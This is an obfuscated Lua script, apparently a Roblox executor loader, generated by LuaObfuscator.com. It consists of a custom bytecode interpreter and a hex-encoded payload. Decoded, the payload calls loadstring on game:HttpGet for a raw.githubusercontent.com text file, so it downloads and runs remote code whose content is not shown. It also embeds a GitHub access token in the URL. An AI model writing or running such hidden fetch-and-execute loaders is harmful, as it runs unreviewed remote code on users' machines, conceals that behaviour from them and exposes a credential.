--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v84=(v31/((5 -3)^(v32-((879 -(282 + 595)) -(1638 -(1523 + 114))))))%((3 -1)^(((v33-(2 -1)) -(v32-1)) + 1)) ;return v84-(v84%(620 -(555 + 58 + 6))) ;else local v85=931 -(857 + 74) ;local v86;while true do if ((568 -(367 + (286 -85)))==v85) then v86=(929 -(214 + 713))^(v32-(1 + (1065 -(68 + 997)))) ;return (((v31%(v86 + v86))>=v86) and 1) or (0 + 0) ;end end end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34=0;local v35;local v36;local v37;local v38;while true do if (v34==(1271 -(226 + (1929 -885)))) then return (v38 * (73054774 -(103316029 -47038471))) + (v37 * ((66003 -(87 + 263)) -(32 + 85))) + (v36 * 256) + v35 ;end if ((0 + 0)==v34) then v35,v36,v37,v38=v1(v16,v19,v19 + 1 + 2 );v19=v19 + (961 -(892 + (245 -(67 + 113)))) ;v34=2 -1 ;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v39=0 -0 ;local v40;local v41;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v39~=(1 + 1)) then else v44=nil;v45=nil;v39=1 + 2 ;end if (v39~=(0 + 0)) then else v40=0;v41=nil;v39=1;end if (v39==(4 + 0)) then while true do if (v40==3) then v47=nil;while true do local v100=0;while true do if (v100==(254 -(163 + 91))) then if (v41~=(1931 -(1869 + 61))) then else local v132=0;while true do if (v132==(1467 -(899 + 568))) then v45={v42,v43,nil,v44};v46=v24();v132=1;end if (v132==(1 -0)) then v47={};v41=2;break;end end end if (v41==(0 + 0)) then v42={};v43={};v44={};v41=1 + 0 ;end v100=1 -0 ;end if (v100==(812 -(569 + 242))) then if (v41~=2) then else local v133=0 -0 ;local v134;while true do if (v133==(0 + 0)) then v134=0;while true do if (v134==(0 + 0)) then for v152=1,v46 do local v153=0;local v154;local v155;local v156;local v157;while true do if (v153==0) then v154=1024 -(706 + 318) ;v155=nil;v153=1252 -(721 + 530) ;end if (v153==(1476 -(1329 + 145))) then while true do if (v154==(971 -(140 + 831))) then local v165=1850 -(1409 + 441) ;local v166;while true do if (v165~=(0 + 0)) then else v166=0;while true do if (v166==(719 -(15 + 703))) then v154=701 -(271 + 429) ;break;end if (v166~=(0 + 0)) then else local v178=0 + 0 ;while true do if (v178~=(438 -(262 + 176))) then else v155=1500 -(1408 + 92) ;v156=nil;v178=1722 -(345 + 1376) ;end if (v178==(689 -(198 + 490))) then v166=4 -3 ;break;end end end end break;end end end if (v154~=(1289 -(993 + 295))) then else v157=nil;while true do if (v155~=0) then else local v171=0 + 0 ;local v172;while true do if (v171==(1171 -(418 + 753))) then v172=0 -0 ;while true do if (v172~=(1206 -(696 + 510))) then else local v185=0 -0 ;while true do if (v185==(1263 -(1091 + 171))) then v172=1;break;end if (v185==(0 + 0)) then v156=v22();v157=nil;v185=1 + 0 ;end end end if (v172~=(1770 -(1749 + 20))) then else v155=1 + 0 ;break;end end break;end end end if (v155==(1323 -(1249 + 73))) then if (v156==(1 + 0)) then v157=v22()~=(0 -0) ;elseif (v156==(6 -4)) then v157=v25();elseif (v156~=(377 -(123 + 251))) then else v157=v26();end v47[v152]=v157;break;end end break;end end break;end if (v153~=(4 -3)) then else v156=nil;v157=nil;v153=2;end end end v45[3]=v22();v134=699 -(208 + 490) ;end if (v134==1) then for v158=1,v24() do local v159=0;local v160;local v161;while true do if (v159~=1) then else while true do if (v160~=(0 + 0)) then else v161=v22();if (v21(v161,1 + 0 ,1)~=0) then else local v167=836 -(660 + 176) ;local v168;local v169;local v170;while true do if (3==v167) then if (v21(v169,1 + 2 ,205 -(14 + 188) )==(676 -(534 + 141))) then v170[2 + 2 ]=v47[v170[4]];end v42[v158]=v170;break;end if ((1 + 0)==v167) then local v175=0 + 0 ;while true do if (v175==1) then v167=1 + 1 ;break;end if ((0 + 0)==v175) then v170={v23(),v23(),nil,nil};if (v168==(0 -0)) then local v186=584 -(57 + 527) ;local v187;while true do if (v186==(1427 -(41 + 1386))) then v187=0;while true do if (v187==0) then v170[2 + 1 ]=v23();v170[3 + 1 ]=v23();break;end end break;end end elseif (v168==(397 -(115 + 281))) then v170[3]=v24();elseif (v168==2) then v170[3]=v24() -((2 + 0)^(37 -21)) ;elseif (v168==(3 + 0)) then local v193=0 -0 ;local v194;while true do if (v193==(0 -0)) then v194=166 -(122 + 44) ;while true do if (v194==(0 -0)) then v170[10 -7 ]=v24() -((2 -0)^(52 -36)) ;v170[871 -(550 + 317) ]=v23();break;end end break;end end end v175=1 -0 ;end end end if ((0 -0)==v167) then local v176=0;local v177;while true do if (v176==(0 -0)) then v177=0;while true do if (v177==(65 -(30 + 35))) then local v188=0 -0 ;while true do if (v188==1) then v177=1;break;end if ((285 -(134 + 151))==v188) then v168=v21(v161,1667 -(970 + 695) ,3);v169=v21(v161,7 -3 ,5 + 1 );v188=1991 -(582 + 1408) ;end end end if (v177==(1258 -(1043 + 214))) then v167=1;break;end end break;end end end if ((6 -4)==v167) then if (v21(v169,3 -2 ,1 -0 )~=(3 -2)) then else v170[1826 -(1195 + 629) ]=v47[v170[5 -3 ]];end if (v21(v169,2 -0 ,322 -(53 + 267) )==1) then v170[1 + 2 ]=v47[v170[3]];end v167=416 -(15 + 398) ;end end end break;end end break;end if (v159==0) then local v164=982 -(18 + 964) ;while true do if ((241 -(187 + 54))==v164) then v160=780 -(162 + 618) ;v161=nil;v164=1;end if (v164~=(1 + 0)) then else v159=1;break;end end end end end v41=2 + 1 ;break;end end break;end end end if (v41~=(2 + 1)) then else local v135=0;local v136;while true do if (0~=v135) then else v136=0;while true do if (v136==(0 -0)) then for v162=1 -0 ,v24() do v43[v162-(1 + 0) ]=v29();end return v45;end end break;end end end break;end end end break;end if (v40~=(1638 -(1373 + 263))) then else local v98=1000 -(451 + 549) ;while true do if (v98==(1 + 0)) then v40=1 + 2 ;break;end if (v98~=(0 -0)) then else v45=nil;v46=nil;v98=1;end end end if ((1 -0)~=v40) then else v43=nil;v44=nil;v40=1 + 1 ;end if (v40==0) then local v99=1384 -(746 + 638) ;while true do if (v99==0) then v41=0 + 0 ;v42=nil;v99=1 -0 ;end if (v99==(342 -(218 + 123))) then v40=1 + 0 ;break;end end end end break;end if (v39~=(1 + 0)) then else v42=nil;v43=nil;v39=1583 -(1535 + 46) ;end if (v39~=3) then else v46=nil;v47=nil;v39=4 + 0 ;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v48=v24();local v49=v24();local v50=1;local v51=(v21(v49,1,1571 -(1126 + 425) ) * ((407 -(118 + 287))^(125 -93))) + v48 ;local v52=v21(v49,1142 -(118 + 1003) ,31);local v53=((v21(v49,93 -61 )==(378 -(142 + 235))) and  -1) or 1 ;if (v52==(0 -(0 + 0))) then if (v51==0) then return v53 * ((0 -0) + 0) ;else local v91=977 -(553 + 424) ;while true do if (v91==(0 -0)) then v52=1 + (753 -(239 + 514)) ;v50=0 + 0 ;break;end end end elseif (v52==(419 + 773 + 855)) then return ((v51==(0 + 0)) and (v53 * ((1 + 0)/((1329 -(797 + 532)) -(0 + 0))))) or (v53 * NaN) ;end return v8(v53,v52-((962 + 1887) -1826) ) * (v50 + (v51/(2^(116 -64)))) ;end v26=nil;function v26(v54)local v55;if  not v54 then v54=v24();if (v54==(0 -0)) then return "";end end v55=v3(v16,v19,(v19 + v54) -(1203 -(373 + 829)) );v19=v19 + v54 ;local v56={};for v68=732 -(476 + 255) , #v55 do v56[v68]=v2(v1(v3(v55,v68,v68)));end return v6(v56);end v18=5;end if (v18==2) then function v22()local v57=v1(v16,v19,v19);v19=v19 + 1 ;return v57;end v23=nil;function v23()local v58=1130 -(369 + 761) ;local v59;local v60;while true do if (v58==(0 + 0 + 0)) then v59,v60=v1(v16,v19,v19 + 2 );v19=v19 + (2 -0) ;v58=1;end if (v58==(1 -0)) then return (v60 * (494 -(64 + 174))) + v59 ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v61)if (v1(v61,2)==79) then v20=v0(v3(v61,1,1));return "";else local v87=v2(v0(v61,16));if v20 then local v92=0;local v93;while true do if (v92==0) then v93=v5(v87,v20);v20=nil;v92=1;end if (v92==1) then return v93;end end else return v87;end end end);v18=1;end if (v18==7) then function v30(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v70=v65;local v71=v66;local v72=v67;local v73=v28;local v74=1;local v75= -1;local v76={};local v77={...};local v78=v12("#",...) -1 ;local v79={};local v80={};for v88=0,v78 do if (v88>=v72) then v76[v88-v72 ]=v77[v88 + 1 ];else v80[v88]=v77[v88 + 1 ];end end local v81=(v78-v72) + 1 ;local v82;local v83;while true do v82=v70[v74];v83=v82[1];if (v83<=6) then if (v83<=2) then if (v83<=0) then v80[v82[2]]=v82[3];elseif (v83>1) then v80[v82[2]]();else do return;end end elseif (v83<=4) then if (v83>3) then local v105=0;local v106;while true do if (v105==0) then v106=v82[2];v80[v106]=v80[v106](v13(v80,v106 + 1 ,v75));break;end end else local v107=v82[2];local v108,v109=v73(v80[v107](v13(v80,v107 + 1 ,v82[3])));v75=(v109 + v107) -1 ;local v110=0;for v127=v107,v75 do v110=v110 + 1 ;v80[v127]=v108[v110];end end elseif (v83>5) then v80[v82[2]]();else local v111=v82[2];v80[v111]=v80[v111](v13(v80,v111 + 1 ,v75));end elseif (v83<=9) then if (v83<=7) then v80[v82[2]]=v64[v82[3]];elseif (v83==8) then local v113=v82[2];local v114,v115=v73(v80[v113](v13(v80,v113 + 1 ,v82[3])));v75=(v115 + v113) -1 ;local v116=0;for v130=v113,v75 do local v131=0;while true do if (v131==0) then v116=v116 + 1 ;v80[v130]=v114[v116];break;end end end else v80[v82[2]]=v64[v82[3]];end elseif (v83<=11) then if (v83>10) then local v119=0;local v120;local v121;while true do if (v119==1) then v80[v120 + 1 ]=v121;v80[v120]=v121[v82[4]];break;end if (v119==0) then v120=v82[2];v121=v80[v82[3]];v119=1;end end else local v122=0;local v123;local v124;while true do if (v122==0) then v123=v82[2];v124=v80[v82[3]];v122=1;end if (v122==1) then v80[v123 + 1 ]=v124;v80[v123]=v124[v82[4]];break;end end end elseif (v83>12) then do return;end else v80[v82[2]]=v82[3];end v74=v74 + 1 ;end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403863O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F672O662O64686664662F2O31343531342E312E2O352F6D61696E2F6E6F254535254134253837254534252O422542442E7478743F746F6B656E3D4748534154306O41434441424D4B375343375051504D524E434D58495935435A45503558434100083O0012073O00013O001207000100023O00200B00010001000300120C000300044O0003000100034O00045O00022O00023O000100012O000D3O00017O00",v9(),...);end